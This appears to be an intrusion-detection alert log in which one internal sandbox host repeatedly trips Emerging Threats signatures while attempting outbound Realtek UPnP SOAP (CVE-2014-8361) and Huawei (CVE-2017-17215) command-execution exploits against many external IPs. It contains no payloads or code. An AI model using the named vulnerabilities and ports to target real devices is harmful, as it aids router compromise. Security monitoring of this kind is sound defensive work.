                                      07/20/24-23:01:10.756983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6023052869192.168.2.2342.191.217.231
                                      07/20/24-23:01:42.608153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4014452869192.168.2.23138.229.180.34
                                      07/20/24-23:01:47.005094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4114652869192.168.2.23146.33.84.180
                                      07/20/24-23:01:11.634372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595437215192.168.2.2399.67.37.89
                                      07/20/24-23:01:25.656173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4736852869192.168.2.23177.181.36.106
                                      07/20/24-23:01:02.057728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402037215192.168.2.2341.99.98.84
                                      07/20/24-23:01:51.932550TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24952052869192.168.2.23135.160.162.200
                                      07/20/24-23:00:59.168569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651237215192.168.2.23197.137.254.119
                                      07/20/24-23:01:45.713934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24739652869192.168.2.238.220.8.58
                                      07/20/24-23:01:04.053605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199637215192.168.2.23157.232.245.24
                                      07/20/24-23:01:11.631549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919637215192.168.2.23157.16.120.147
                                      07/20/24-23:01:02.064358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091437215192.168.2.23157.200.107.177
                                      07/20/24-23:01:41.176787TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614982652869192.168.2.2344.113.54.165
                                      07/20/24-23:01:04.031510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847237215192.168.2.23157.194.46.134
                                      07/20/24-23:01:06.988055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116837215192.168.2.2341.212.175.247
                                      07/20/24-23:01:43.164529TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25639452869192.168.2.23118.209.219.113
                                      07/20/24-23:01:34.044223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5340837215192.168.2.23157.25.31.241
                                      07/20/24-23:02:00.538390TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615326252869192.168.2.23103.238.68.11
                                      07/20/24-23:01:44.971718TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614483052869192.168.2.23213.131.100.211
                                      07/20/24-23:01:56.287639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3858252869192.168.2.2370.135.187.127
                                      07/20/24-23:01:59.353096TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3730452869192.168.2.23124.255.77.181
                                      07/20/24-23:01:02.048367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626637215192.168.2.23176.150.171.140
                                      07/20/24-23:01:43.686153TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25091852869192.168.2.23172.233.108.76
                                      07/20/24-23:01:47.931222TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25699452869192.168.2.23114.55.77.0
                                      07/20/24-23:01:57.489843TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615892452869192.168.2.23207.166.244.138
                                      07/20/24-23:02:08.171169TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614456652869192.168.2.2342.89.136.69
                                      07/20/24-23:01:01.212254TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4872652869192.168.2.23142.90.33.83
                                      07/20/24-23:01:08.691384TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25145852869192.168.2.23154.97.74.140
                                      07/20/24-23:01:46.054776TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6091652869192.168.2.23137.109.251.204
                                      07/20/24-23:02:12.193882TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614100652869192.168.2.23197.114.179.188
                                      07/20/24-23:01:42.985200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4599452869192.168.2.23169.196.10.52
                                      07/20/24-23:01:44.277250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25461452869192.168.2.23192.12.75.155
                                      07/20/24-23:01:48.369883TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614097252869192.168.2.23166.102.172.20
                                      07/20/24-23:01:59.938491TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614608652869192.168.2.23128.36.26.52
                                      07/20/24-23:01:53.472037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5847252869192.168.2.2382.240.7.131
                                      07/20/24-23:02:10.141900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4866252869192.168.2.23168.32.23.40
                                      07/20/24-23:01:14.113390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402437215192.168.2.23197.105.252.117
                                      07/20/24-23:02:35.459810TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4899252869192.168.2.2331.72.24.180
                                      07/20/24-23:01:45.485100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5463852869192.168.2.2341.48.241.197
                                      07/20/24-23:01:42.520139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3625452869192.168.2.23222.217.185.57
                                      07/20/24-23:02:01.280564TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614659452869192.168.2.23161.225.124.226
                                      07/20/24-23:01:45.064977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4586252869192.168.2.23177.220.208.210
                                      07/20/24-23:01:41.258403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3594452869192.168.2.2384.227.123.147
                                      07/20/24-23:01:41.620386TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5028252869192.168.2.23111.66.162.186
                                      07/20/24-23:01:45.926465TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3385452869192.168.2.23220.112.19.15
                                      07/20/24-23:01:49.693650TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6096252869192.168.2.2354.42.165.29
                                      07/20/24-23:01:34.050313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052237215192.168.2.2341.201.163.171
                                      07/20/24-23:01:25.300817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615265852869192.168.2.23220.0.122.40
                                      07/20/24-23:01:31.975107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4698437215192.168.2.23197.141.21.74
                                      07/20/24-23:01:51.258596TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24649252869192.168.2.23122.90.179.148
                                      07/20/24-23:01:50.085627TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25261852869192.168.2.23151.41.38.224
                                      07/20/24-23:01:04.064240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901637215192.168.2.23157.161.162.111
                                      07/20/24-23:01:24.944299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837037215192.168.2.23157.128.42.189
                                      07/20/24-23:01:31.977603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4455637215192.168.2.23197.102.132.79
                                      07/20/24-23:01:42.636583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5958052869192.168.2.23153.113.97.179
                                      07/20/24-23:00:57.220833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346237215192.168.2.2341.107.86.189
                                      07/20/24-23:02:00.338154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6088052869192.168.2.2366.250.122.217
                                      07/20/24-23:01:11.820979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536637215192.168.2.23157.25.141.126
                                      07/20/24-23:01:41.337240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613794852869192.168.2.23115.35.192.158
                                      07/20/24-23:01:48.576249TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613413252869192.168.2.2337.189.26.199
                                      07/20/24-23:02:01.201976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615346652869192.168.2.23167.60.51.106
                                      07/20/24-23:01:08.555687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4765852869192.168.2.23109.80.210.12
                                      07/20/24-23:01:08.686800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4668052869192.168.2.23216.207.228.137
                                      07/20/24-23:01:08.677485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23288252869192.168.2.23162.162.162.31
                                      07/20/24-23:01:14.103467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532437215192.168.2.2341.90.164.103
                                      07/20/24-23:01:20.131339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636037215192.168.2.2341.169.34.148
                                      07/20/24-23:01:24.877747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3722237215192.168.2.23144.93.159.93
                                      07/20/24-23:01:27.749737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3657437215192.168.2.23177.70.134.46
                                      07/20/24-23:01:42.287237TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23328852869192.168.2.23137.75.123.123
                                      07/20/24-23:01:57.049485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4344852869192.168.2.2349.91.98.221
                                      07/20/24-23:01:24.910426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407237215192.168.2.2341.84.150.41
                                      07/20/24-23:01:43.170156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614040052869192.168.2.23222.227.230.240
                                      07/20/24-23:01:08.655109TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24442852869192.168.2.23155.22.90.90
                                      07/20/24-23:01:03.439543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614495452869192.168.2.2360.99.150.220
                                      07/20/24-23:01:00.651026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165837215192.168.2.2343.131.249.62
                                      07/20/24-23:01:11.817771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509437215192.168.2.23157.103.119.53
                                      07/20/24-23:01:13.618084TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614587852869192.168.2.2343.124.104.253
                                      07/20/24-23:00:57.220899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873437215192.168.2.2341.174.115.244
                                      07/20/24-23:01:04.039129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4548237215192.168.2.23157.237.121.217
                                      07/20/24-23:01:31.312895TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25167652869192.168.2.23123.249.201.235
                                      07/20/24-23:01:47.572503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4503252869192.168.2.2386.216.107.76
                                      07/20/24-23:01:31.991548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479837215192.168.2.2341.24.2.217
                                      07/20/24-23:01:55.572517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4119652869192.168.2.23169.122.121.121
                                      07/20/24-23:00:59.178062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003637215192.168.2.2388.195.110.211
                                      07/20/24-23:01:32.059767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741637215192.168.2.23157.197.119.108
                                      07/20/24-23:01:43.571815TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24162452869192.168.2.23203.162.151.3
                                      07/20/24-23:01:53.407777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5160252869192.168.2.23111.91.178.70
                                      07/20/24-23:01:00.639012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731037215192.168.2.23157.115.23.92
                                      07/20/24-23:01:27.666100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479837215192.168.2.23138.151.216.98
                                      07/20/24-23:01:50.370395TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613304652869192.168.2.23166.191.111.147
                                      07/20/24-23:01:51.113660TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3701052869192.168.2.23140.189.156.39
                                      07/20/24-23:01:21.952782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5549237215192.168.2.2341.44.152.150
                                      07/20/24-23:01:43.305781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5264852869192.168.2.231.198.183.23
                                      07/20/24-23:02:53.636754TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3431252869192.168.2.2343.198.199.207
                                      07/20/24-23:01:42.390246TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615479452869192.168.2.23111.85.168.68
                                      07/20/24-23:01:48.102919TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26057052869192.168.2.2366.43.237.112
                                      07/20/24-23:01:42.749469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4645452869192.168.2.23111.186.32.47
                                      07/20/24-23:00:59.196993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3342437215192.168.2.23157.77.208.129
                                      07/20/24-23:01:03.186337TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615666052869192.168.2.23166.7.60.196
                                      07/20/24-23:01:43.063994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4578252869192.168.2.23220.31.50.128
                                      07/20/24-23:01:48.834296TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3379652869192.168.2.2350.12.228.50
                                      07/20/24-23:01:42.136560TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616004852869192.168.2.2367.41.35.87
                                      07/20/24-23:01:41.412156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614455452869192.168.2.23154.201.154.131
                                      07/20/24-23:01:08.663244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5854252869192.168.2.23139.21.143.158
                                      07/20/24-23:01:58.146169TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25403652869192.168.2.23134.217.248.188
                                      07/20/24-23:01:57.346494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4145652869192.168.2.2327.214.50.214
                                      07/20/24-23:01:08.589759TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25978452869192.168.2.23218.167.11.188
                                      07/20/24-23:01:57.512168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3810452869192.168.2.2314.187.245.173
                                      07/20/24-23:01:08.663245TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3602852869192.168.2.23168.229.219.185
                                      07/20/24-23:01:42.809716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3729052869192.168.2.2317.37.38.42
                                      07/20/24-23:01:52.390301TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5144652869192.168.2.23105.70.135.245
                                      07/20/24-23:01:01.818567TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6020052869192.168.2.2325.222.248.206
                                      07/20/24-23:01:46.220244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614051852869192.168.2.23104.155.48.50
                                      07/20/24-23:01:50.223705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23559652869192.168.2.2363.137.171.145
                                      07/20/24-23:01:11.630833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658637215192.168.2.23197.224.131.168
                                      07/20/24-23:02:18.238800TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616046452869192.168.2.23171.248.87.10
                                      07/20/24-23:01:49.070413TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613318452869192.168.2.23216.27.105.182
                                      07/20/24-23:01:48.322055TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614228252869192.168.2.23172.42.36.143
                                      07/20/24-23:01:42.915641TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613790852869192.168.2.23195.86.64.66
                                      07/20/24-23:01:47.821658TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708852869192.168.2.23223.33.49.156
                                      07/20/24-23:01:56.719998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4066252869192.168.2.2375.93.244.9
                                      07/20/24-23:01:42.508021TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5075852869192.168.2.23186.5.70.201
                                      07/20/24-23:01:45.233561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5477452869192.168.2.23166.201.201.44
                                      07/20/24-23:01:53.066716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3718452869192.168.2.23192.245.224.230
                                      07/20/24-23:01:42.636583TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615527252869192.168.2.23180.183.76.230
                                      07/20/24-23:01:14.013095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940637215192.168.2.23157.2.94.148
                                      07/20/24-23:01:42.617689TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26027452869192.168.2.23186.150.2.45
                                      07/20/24-23:01:20.596401TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4636052869192.168.2.2362.216.86.224
                                      07/20/24-23:01:11.632393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204837215192.168.2.2341.202.90.168
                                      07/20/24-23:01:42.762943TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5329652869192.168.2.2394.66.88.32
                                      07/20/24-23:01:06.989167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630637215192.168.2.23167.13.180.172
                                      07/20/24-23:01:44.295391TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615035652869192.168.2.23120.63.90.68
                                      07/20/24-23:01:42.634606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3346452869192.168.2.23181.147.220.98
                                      07/20/24-23:01:20.181938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3283637215192.168.2.23157.66.141.65
                                      07/20/24-23:01:58.945733TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613361852869192.168.2.2327.10.81.5
                                      07/20/24-23:01:46.261026TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3857652869192.168.2.23118.191.35.155
                                      07/20/24-23:01:43.096223TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6032852869192.168.2.23153.113.97.179
                                      07/20/24-23:01:51.932550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3590652869192.168.2.23203.130.71.37
                                      07/20/24-23:01:45.095767TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5804252869192.168.2.23156.160.38.108
                                      07/20/24-23:01:20.161614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443237215192.168.2.23157.157.95.90
                                      07/20/24-23:01:42.995118TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26043052869192.168.2.23161.210.183.51
                                      07/20/24-23:00:59.194576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420837215192.168.2.23157.121.143.8
                                      07/20/24-23:01:41.960623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4533452869192.168.2.23208.75.90.116
                                      07/20/24-23:01:49.809920TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25440252869192.168.2.2334.139.90.241
                                      07/20/24-23:01:42.627588TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615195052869192.168.2.23174.16.2.141
                                      07/20/24-23:01:46.444461TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24752652869192.168.2.23151.244.29.112
                                      07/20/24-23:01:58.152789TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23836252869192.168.2.2370.101.195.243
                                      07/20/24-23:01:08.571946TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25434052869192.168.2.23105.234.100.63
                                      07/20/24-23:01:14.367036TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614416052869192.168.2.23109.120.196.186
                                      07/20/24-23:01:45.233561TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23905452869192.168.2.232.166.49.173
                                      07/20/24-23:01:59.449569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5807252869192.168.2.23129.15.238.37
                                      07/20/24-23:01:02.113054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551237215192.168.2.2385.79.139.138
                                      07/20/24-23:01:27.650975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336837215192.168.2.23197.192.90.143
                                      07/20/24-23:01:11.642449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118037215192.168.2.2341.255.190.193
                                      07/20/24-23:01:11.639230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4143437215192.168.2.2399.12.166.177
                                      07/20/24-23:01:20.591702TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24061252869192.168.2.2394.32.208.135
                                      07/20/24-23:01:31.976649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598237215192.168.2.2341.175.115.88
                                      07/20/24-23:01:25.481306TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615679852869192.168.2.235.207.112.150
                                      07/20/24-23:00:57.220905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028237215192.168.2.2323.141.91.228
                                      07/20/24-23:01:41.266946TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615180452869192.168.2.23193.38.103.224
                                      07/20/24-23:01:34.045749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385637215192.168.2.2378.116.5.24
                                      07/20/24-23:01:41.419124TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3578852869192.168.2.23196.248.47.177
                                      07/20/24-23:01:24.867858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834437215192.168.2.2323.196.138.54
                                      07/20/24-23:01:42.566124TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4187652869192.168.2.23175.125.31.24
                                      07/20/24-23:01:42.740527TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4320652869192.168.2.238.243.36.237
                                      07/20/24-23:01:52.193913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5449052869192.168.2.23179.220.184.21
                                      07/20/24-23:01:00.654988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554637215192.168.2.23157.12.106.29
                                      07/20/24-23:01:44.870961TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614228852869192.168.2.2391.225.198.252
                                      07/20/24-23:01:08.585790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25853852869192.168.2.2334.53.37.254
                                      07/20/24-23:01:45.582631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3757652869192.168.2.2347.192.243.189
                                      07/20/24-23:01:41.758923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3562852869192.168.2.23193.15.215.48
                                      07/20/24-23:01:45.196200TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25651252869192.168.2.2363.237.109.125
                                      07/20/24-23:01:56.400580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5723852869192.168.2.23140.234.5.119
                                      07/20/24-23:01:14.105395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4294237215192.168.2.2341.69.181.229
                                      07/20/24-23:01:14.158864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4242452869192.168.2.23138.74.14.28
                                      07/20/24-23:01:43.190671TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615499852869192.168.2.23120.189.67.125
                                      07/20/24-23:01:45.197712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4667252869192.168.2.23153.197.120.12
